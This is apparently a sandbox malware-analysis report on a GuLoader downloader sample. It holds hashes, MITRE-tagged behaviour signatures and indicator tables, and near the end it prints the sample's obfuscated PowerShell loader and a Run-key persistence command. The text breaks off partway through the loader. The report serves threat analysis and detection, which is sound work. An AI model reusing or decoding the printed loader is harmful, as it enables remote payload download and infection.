guloader | ae209d68e74043c4e35bcf2d96fa87bc11c06c0ae7e8d6b8811663b12b436223

Analysis

max time kernel
149s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
07/09/2024, 01:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ae209d68e74043c4e35bcf2d96fa87bc11c06c0ae7e8d6b8811663b12b436223.vbe
Size

26KB
MD5

b1080f44b0e21233fcb22c3f258ecf90
SHA1

607f1eccc4974439ccd511ae4f7aed90697aba2c
SHA256

ae209d68e74043c4e35bcf2d96fa87bc11c06c0ae7e8d6b8811663b12b436223
SHA512

70ca3bc81b20fae734508fae339ed98103fe09f6ee749b903f148c7d0b258ac9576213a53dbbbf08cb43f1d9f32ab8e96f806f33e653e94b28e5a4f4ed0c6784
SSDEEP

384:8NigjIzBPT9rCsdkqArkZGq+oycWhvAnwU/xfUk:SMdNCDHkZqoycWhvAn7uk

Score

10^/10

guloader discovery downloader persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 2 IoCs

flow	pid	Process
15	316	powershell.exe
17	316	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hyklere = "%Mouthwatering% -w 1 $Stumpiness=(Get-ItemProperty -Path 'HKCU:\\Panicful132\\').Reincited;%Mouthwatering% ($Stumpiness)"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
15	drive.google.com
39	drive.google.com
14	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
1512	wab.exe
1512	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4764	powershell.exe
1512	wab.exe

Suspicious use of SetThreadContext 55 IoCs

description	pid	Process	procid_target
PID 4764 set thread context of 1512	4764	powershell.exe	98
PID 1512 set thread context of 4412	1512	wab.exe	104
PID 1512 set thread context of 4176	1512	wab.exe	106
PID 1512 set thread context of 940	1512	wab.exe	107
PID 1512 set thread context of 4744	1512	wab.exe	108
PID 1512 set thread context of 4376	1512	wab.exe	109
PID 1512 set thread context of 1540	1512	wab.exe	110
PID 1512 set thread context of 2376	1512	wab.exe	111
PID 1512 set thread context of 1040	1512	wab.exe	112
PID 1512 set thread context of 2120	1512	wab.exe	113
PID 1512 set thread context of 1972	1512	wab.exe	114
PID 1512 set thread context of 4140	1512	wab.exe	115
PID 1512 set thread context of 372	1512	wab.exe	116
PID 1512 set thread context of 4992	1512	wab.exe	117
PID 1512 set thread context of 4344	1512	wab.exe	118
PID 1512 set thread context of 3724	1512	wab.exe	119
PID 1512 set thread context of 3080	1512	wab.exe	120
PID 1512 set thread context of 1200	1512	wab.exe	121
PID 1512 set thread context of 1988	1512	wab.exe	122
PID 1512 set thread context of 3200	1512	wab.exe	123
PID 1512 set thread context of 1796	1512	wab.exe	124
PID 1512 set thread context of 4596	1512	wab.exe	125
PID 1512 set thread context of 3768	1512	wab.exe	126
PID 1512 set thread context of 400	1512	wab.exe	127
PID 1512 set thread context of 812	1512	wab.exe	128
PID 1512 set thread context of 2752	1512	wab.exe	129
PID 1512 set thread context of 4460	1512	wab.exe	130
PID 1512 set thread context of 3884	1512	wab.exe	131
PID 1512 set thread context of 4860	1512	wab.exe	132
PID 1512 set thread context of 3184	1512	wab.exe	133
PID 1512 set thread context of 2952	1512	wab.exe	134
PID 1512 set thread context of 2112	1512	wab.exe	135
PID 1512 set thread context of 4816	1512	wab.exe	136
PID 1512 set thread context of 3800	1512	wab.exe	137
PID 1512 set thread context of 4532	1512	wab.exe	138
PID 1512 set thread context of 1360	1512	wab.exe	139
PID 1512 set thread context of 1528	1512	wab.exe	140
PID 1512 set thread context of 3912	1512	wab.exe	141
PID 1512 set thread context of 2692	1512	wab.exe	142
PID 1512 set thread context of 1984	1512	wab.exe	143
PID 1512 set thread context of 3920	1512	wab.exe	144
PID 1512 set thread context of 5076	1512	wab.exe	145
PID 1512 set thread context of 1632	1512	wab.exe	146
PID 1512 set thread context of 4796	1512	wab.exe	147
PID 1512 set thread context of 1668	1512	wab.exe	148
PID 1512 set thread context of 1416	1512	wab.exe	149
PID 1512 set thread context of 1332	1512	wab.exe	150
PID 1512 set thread context of 2096	1512	wab.exe	151
PID 1512 set thread context of 3464	1512	wab.exe	152
PID 1512 set thread context of 4028	1512	wab.exe	153
PID 1512 set thread context of 1288	1512	wab.exe	154
PID 1512 set thread context of 1264	1512	wab.exe	155
PID 1512 set thread context of 624	1512	wab.exe	156
PID 1512 set thread context of 3952	1512	wab.exe	157
PID 1512 set thread context of 1636	1512	wab.exe	158

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 59 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wab.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe

Modifies registry class 54 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	svchost.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1528	reg.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
316	powershell.exe
316	powershell.exe
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe

Suspicious behavior: MapViewOfSection 55 IoCs

pid	Process
4764	powershell.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe
1512	wab.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	316	powershell.exe
Token: SeDebugPrivilege	4764	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1512	wab.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4780 wrote to memory of 316	4780	WScript.exe	86
PID 4780 wrote to memory of 316	4780	WScript.exe	86
PID 316 wrote to memory of 1820	316	powershell.exe	90
PID 316 wrote to memory of 1820	316	powershell.exe	90
PID 316 wrote to memory of 4764	316	powershell.exe	96
PID 316 wrote to memory of 4764	316	powershell.exe	96
PID 316 wrote to memory of 4764	316	powershell.exe	96
PID 4764 wrote to memory of 1288	4764	powershell.exe	97
PID 4764 wrote to memory of 1288	4764	powershell.exe	97
PID 4764 wrote to memory of 1288	4764	powershell.exe	97
PID 4764 wrote to memory of 1512	4764	powershell.exe	98
PID 4764 wrote to memory of 1512	4764	powershell.exe	98
PID 4764 wrote to memory of 1512	4764	powershell.exe	98
PID 4764 wrote to memory of 1512	4764	powershell.exe	98
PID 4764 wrote to memory of 1512	4764	powershell.exe	98
PID 1512 wrote to memory of 4792	1512	wab.exe	101
PID 1512 wrote to memory of 4792	1512	wab.exe	101
PID 1512 wrote to memory of 4792	1512	wab.exe	101
PID 4792 wrote to memory of 1528	4792	cmd.exe	103
PID 4792 wrote to memory of 1528	4792	cmd.exe	103
PID 4792 wrote to memory of 1528	4792	cmd.exe	103
PID 1512 wrote to memory of 4412	1512	wab.exe	104
PID 1512 wrote to memory of 4412	1512	wab.exe	104
PID 1512 wrote to memory of 4412	1512	wab.exe	104
PID 1512 wrote to memory of 4412	1512	wab.exe	104
PID 1512 wrote to memory of 4176	1512	wab.exe	106
PID 1512 wrote to memory of 4176	1512	wab.exe	106
PID 1512 wrote to memory of 4176	1512	wab.exe	106
PID 1512 wrote to memory of 4176	1512	wab.exe	106
PID 1512 wrote to memory of 940	1512	wab.exe	107
PID 1512 wrote to memory of 940	1512	wab.exe	107
PID 1512 wrote to memory of 940	1512	wab.exe	107
PID 1512 wrote to memory of 940	1512	wab.exe	107
PID 1512 wrote to memory of 4744	1512	wab.exe	108
PID 1512 wrote to memory of 4744	1512	wab.exe	108
PID 1512 wrote to memory of 4744	1512	wab.exe	108
PID 1512 wrote to memory of 4744	1512	wab.exe	108
PID 1512 wrote to memory of 4376	1512	wab.exe	109
PID 1512 wrote to memory of 4376	1512	wab.exe	109
PID 1512 wrote to memory of 4376	1512	wab.exe	109
PID 1512 wrote to memory of 4376	1512	wab.exe	109
PID 1512 wrote to memory of 1540	1512	wab.exe	110
PID 1512 wrote to memory of 1540	1512	wab.exe	110
PID 1512 wrote to memory of 1540	1512	wab.exe	110
PID 1512 wrote to memory of 1540	1512	wab.exe	110
PID 1512 wrote to memory of 2376	1512	wab.exe	111
PID 1512 wrote to memory of 2376	1512	wab.exe	111
PID 1512 wrote to memory of 2376	1512	wab.exe	111
PID 1512 wrote to memory of 2376	1512	wab.exe	111
PID 1512 wrote to memory of 1040	1512	wab.exe	112
PID 1512 wrote to memory of 1040	1512	wab.exe	112
PID 1512 wrote to memory of 1040	1512	wab.exe	112
PID 1512 wrote to memory of 1040	1512	wab.exe	112
PID 1512 wrote to memory of 2120	1512	wab.exe	113
PID 1512 wrote to memory of 2120	1512	wab.exe	113
PID 1512 wrote to memory of 2120	1512	wab.exe	113
PID 1512 wrote to memory of 2120	1512	wab.exe	113
PID 1512 wrote to memory of 1972	1512	wab.exe	114
PID 1512 wrote to memory of 1972	1512	wab.exe	114
PID 1512 wrote to memory of 1972	1512	wab.exe	114
PID 1512 wrote to memory of 1972	1512	wab.exe	114
PID 1512 wrote to memory of 4140	1512	wab.exe	115
PID 1512 wrote to memory of 4140	1512	wab.exe	115
PID 1512 wrote to memory of 4140	1512	wab.exe	115

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ae209d68e74043c4e35bcf2d96fa87bc11c06c0ae7e8d6b8811663b12b436223.vbe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4780
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.Name) {$Sandsynligstenjucundity++;$Rvfulde230+='subst';$Rvfulde230+='r';}$Rvfulde230+='ing';Function Sonorific($Sandsynligsteffrit){$Gibbsite186=$Sandsynligsteffrit.Length-$Sandsynligstenjucundity;For( $Sandsynligste=5;$Sandsynligste -lt $Gibbsite186;$Sandsynligste+=6){$Myocyte+=$Sandsynligsteffrit.$Rvfulde230.'Invoke'( $Sandsynligste, $Sandsynligstenjucundity);}$Myocyte;}function Theah($Njagtigst){ . ($Aberrational) ($Njagtigst);}$Detacherer=Sonorific 'PickoMoversofyrstzMi,triFo,ral ,isplFejlvaSl,tn/Po.si5Smalf.tabel0Medby Cocur(NordfWAs ociUdp.nnTrampd Stngo.xhalwOrgonsHylde de ivNEgyptT Tidl rovi1Konst0Komme..mtre0 ozik;Puckl TvehW.kemaiindbrnMrket6Surp.4Li,ni;F.imu BalaxH pte6Collu4Diffe;.euph Phobir Indtvfiske: bu.s1Overr2,hino1Svamp.Dobbe0clino) Bha UdsynGBead.e RebecJazzmkZiegloHumou/indsk2Krush0Offic1Breds0Ref.r0Herns1Karto0 Aut 1Baetu L.tiFVavasiPris.rBuhkoeFli efDryppoImpulxArome/Remin1nutid2Rgnes1Serio.Tench0Persu ';$Tilbagekbets=Sonorific 'RulskUDuttesVitrieGottorFo.wa- HelcA nspigUnan.eCentin,emnitStri, ';$Metodikere=Sonorific 'VandfhMonertNoncotKuplep .ixtsUnedg:Nonte/D,pon/Ea.tedTjenerPyr.miUpwelv Decoeslu,e.Ostargl,genopea.ooMokkegLve alToraneOve.b.ContrcLgeploLedormStreg/Non,auKoftgc Ac i?DispeeRidsexhebripChampoSarinr ormitTartu=SociadSandeo Pencw IndknBrattl Polyo Tos,a Barodb.ssi& RequiTi,tnd Vedl=Hipli1Amphii urisgAnthoT Pronp HubbMAllofp Unex5AuthoU Tev,1Salts3 adaryClemm3 Nonuc ChesMGenpap ConcDSprog4HelsssTerrns LyssLRecrim PopuoHazeld u,enaR,pacWPhytoHMa,ap9Im,ot7BuffodballoZJohnaiBeltiF lumi ';$lymphogranulomas=Sonorific 'funkt>Mart, ';$Aberrational=Sonorific ' Exc.iD rkce PagexKnude ';$Sandsynligstenitialdeterminanten='Astroglia';$Multitudinary = Sonorific ',ninje ,avacStonihlovfsoCau,i Levir% ,leuaGenkepB,rgepGtestdmedaraindlrtBeshia Sy.t%Sylla\Fi kePF,rsvrRhachoFiffipForsioNasicsUdarbi HalutS,vsuiDekliob ugenevokeiCaph,sSpeedeLndstsIrrep.V disLErythidownhgComiq Mugni&sup a& Gamb Co,eneMosstcKattehMetago Fa,c NonstIntro ';Theah (Sonorific ' Kold$U hveg sprilDa,seoMacrobOveraapit.nlGorgl:Cypr,Pdigela ro,dpCry teSimplrProvs=Kikke(EkstrcPistamGe gpdHeeco Hedeg/Dekupc Kvad B.ss$PessiMMilliufr ttlAffectSaligiGrapht Fon u versds enjiGullbnEs oca SuborPewleyProvi)Fiant ');Theah (Sonorific ' valg$ salig FremlPita,o Kuveb A.rsaK.nsulMirki: EclibThrivuOverrr trocr Et.ieForkys S.abnUnw.xeUdsprr Sin.rVirileUnglorDrmmenRetteeStasi=Bilha$Und,sMUm,nde Unret Bit,osavskdunevoi fterkbonzeeSwararKvaliePropr.HaviosFejlrpTantalDiveri KdertReins(tidsk$KredslArmscyStignm B gjpumulih Hvl,oCavalgNeurorNemataGrundnGhaffuSporalBl.odoBismumLimebaMethosTorni) Komp ');Theah (Sonorific 'Jenom[Data,NSpri,e.ndavt Xylo.Herm,SDi teeSeminrRent v TatsiAf.nncMan.eeThermPSup ao Po.tiTinglnGeomotCreatMHvlbna,oebenNonvia ispug hylleCountrbaggr]Stu.l:.hoto:Ge.foSVermue Untac Cab uBakser Dekli NavntFlydey,ntriPO,erlrNonhyoHerbitVederoSnda crepanoArchglVelta Dona=Muffe Kre,e[BaromNnrkleeHaandtCy.is.EglamSReconeD.funcsymptuGer.irNetmeiDirektAcetyyVirklPFej hr ,fteoels,stDybdeo Latec E.icoAab.nlBerntTHalftyDomsmpPeri eEfter] E.hn:Agglu:CerebT MesalAutossUnher1Fysik2For a ');$Metodikere=$burresnerrerne[0];$Dishabituate= (Sonorific 'biome$SolilgBortelfuelioFlageb Ab,racuratlVideo:Ldr,uHAarsayKrsels Cy.ntOr.inaGru,ddUns,ee UnderNonusnSkalle jobs=optodNNegoteBlaynwBloke-Non.sOStan,b Re.ejUndereKids,cSteamtO mer Byel.S ApelyTerpesLivsttBe.pre F.gem alsk.Pre.iNBo.laeIsvint Uds,.SkotjW FarvecaginbPi.nuCJewellAndani Il,feUnjudn Ro.kt');$Dishabituate+=$Paper[1];Theah ($Dishabituate);Theah (Sonorific 'Kokos$RutscHTvangyLivbasudraatRewaraDitrodBeplaeTale.rGennenVa.iaeLov,y.,viksHUdskie .rsaa,dstrdWaughePrintrBersasCompl[ excl$ De,fTHutt,iBagatl BlombKlovnaApok,g MaalesynkokSpillbDomineKugletOut.rs Huma]M,rle=Dest.$WatchDElimieSubopta omiaCog acEpis.hNonreeNobelr rndeArbejrProso ');$Metalizations=Sonorific 'Zooge$Beg,nHJohniye kelsArkittentopaAbs.ldNaphteR.tiorS,rygnEmulseCoal,.subliDSeneso.onnewTilstnCon,elBi,rooungdoa R,abdE,damFOverbiRetirlC.rise F.rn(akrob$ReforMOpdraeBrud.tmu hfoAntrid phoniBermtkuvejseUtilirPretrehemme,Unpre$IdentHPrludyFor.jsR,distL,vemr ForeeReckvnDottieUnpac)bacch ';$Hystrene=$Paper[0];Theah (Sonorific ' Comb$For.sgPla,ilResbooLaasebBlokaaPursel Mods: PariSCap,lu Adkol CoshpOdisehbeniguSanafr Wob.iPacifslok,leIntelsRad o=G.ron(nifesTFejlieMohocsIsohyt.isse-EriksPtele.aTn.intSuperh Zill Ga,ac$Sy.teHFasanyFountsChitatB.samrStarte U,vinlodd,eSttte)Aban ');while (!$Sulphurises) {Theah (Sonorific ',eosc$ CarigS micl Pebeo.anklbbil.aa Tulll Pred:MentaKo eralB ggaa geregRudskeUnornsFormaa T.ndg UdhueIsraenUnexps Seni= Une,$ ,rontTyfonrMessauSkavgeSalpe ') ;Theah $Metalizations;Theah (Sonorific ' Un rSFo.ortZoanta fhrrGlottt Pa,f- CounSHarmllElecteBesseeBa,kcp.omic Skytt4,arad ');Theah (Sonorific 'pusse$Abomag TrawlPachyoKoncib L,udaTils.l Sur,:RetrySDragou LektlSquampDimerh 